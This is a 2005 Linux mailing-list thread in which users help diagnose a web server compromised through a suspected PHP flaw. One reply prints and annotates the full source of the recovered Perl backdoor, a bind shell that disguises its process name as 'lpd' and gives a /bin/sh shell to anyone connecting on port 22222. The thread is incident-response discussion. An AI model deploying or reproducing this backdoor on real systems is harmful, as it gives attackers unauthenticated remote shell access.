Barbara M. wrote:
> On Tue, 15 Nov 2005, Vidar Tyldum Hansen wrote:
>
>
>>>A friends that have an httpd server based on TSL 2.2 have received this
>>>mail:
>>>
>>>-------------------------------------------
>>>Subject: Your_host_have_been_attacked
>>>
>>>Your host have been attacked by pv script. Look on netstat -anp for
>>>process listen on 4123 port
>>>
>>>-------------------------------------------
>>>
>>>
>>>It tell me that there is a process listing on port 4123 and another on
>>>22222. Stopping httpd and killing the process that own the daemons seems
>>>temporarily "solve" the problem.
>>>He did that process are owned by httpd.
>>>It is now busy in rebuilding a new box where to migrate data, so request
>>>me to collect info on the "pv script".
>>>Any hints?
>>
>>Name of process? Where does it live on the filesystem?
>
>
> I haven't see the server; It tell me that the process is named "perl"
> And find a perl script in /tmp
>
>
>>What does a 'strings filename' reveal?
>
> Can explain this?
if the program is a binary (compiled) file, then "strings" will dump
textual strings from the binary for you (try strings /bin/ls)
>>Go through the access-logs for apache. My guess is that there was a
>>badly written PHP app on it and that led to remote execution
>>vulnerabilities.
>
>
> Suggested;
> Replay: "Yes, but parsing some GB of log without an idea on what exactly
> search ..."
grep for the name of the running script, in this case "pv2"
>>The fact that all the parasites ran as httpd and not root points very
>>hard in that direction.
> ---------pv2------------------------
> #!/usr/bin/perl
> use Socket;
these are settings;
> $port=22222;
> $proto=getprotobyname('tcp');
> $cmd="lpd";
> $system='/bin/sh';
> $0=$cmd;
this opens the port specified above and waits for connections on that port
> socket(SERVER, PF_INET, SOCK_STREAM, $proto) or die "socket:$!";
> setsockopt(SERVER, SOL_SOCKET, SO_REUSEADDR, pack("l", 1)) or die
> "setsockopt: $!";
> bind(SERVER, sockaddr_in($port, INADDR_ANY)) or die "bind: $!";
> listen(SERVER, SOMAXCONN) or die "listen: $!";
> for(;$paddr=accept(CLIENT, SERVER);close CLIENT) {
this connects STDIN, STDOUT and STDERR of the executed program to the
client connected..
> open(STDIN, ">&CLIENT");
> open(STDOUT, ">&CLIENT");
> open(STDERR, ">&CLIENT");
> system($system);
> close(STDIN);
> close(STDOUT);
> close(STDERR);
> }
the net effect being; telnet to port 22222 on the box, and get a shell
as the user running the pv2 script
Cheers,
--
Morten
_______________________________________________
tsl-discuss mailing list
[email protected]
http://lists.trustix.org/mailman/listinfo/tsl-discuss
